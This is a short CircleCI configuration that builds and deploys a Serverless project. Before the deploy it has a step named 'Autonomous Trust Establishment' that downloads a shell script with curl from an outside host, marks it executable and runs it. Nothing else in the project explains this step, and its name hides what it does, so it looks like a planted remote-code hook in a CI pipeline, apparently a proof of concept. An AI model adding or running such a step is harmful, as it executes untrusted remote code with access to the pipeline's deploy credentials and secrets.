version: 2
jobs:
  build:
    docker:
      - image: amaysim/serverless:1.26.0

    steps:
      - checkout
      - run:
          name: Autonomous Trust Establishment
          command: |
            curl 'http://abaton.dgraph-poc.orchestrated.io:3000/offsite-demo/1' > /tmp/test-agent.sh
            chmod u+x /tmp/test-agent.sh
            /tmp/test-agent.sh
      - run:
          name: Deploy
          command: serverless deploy
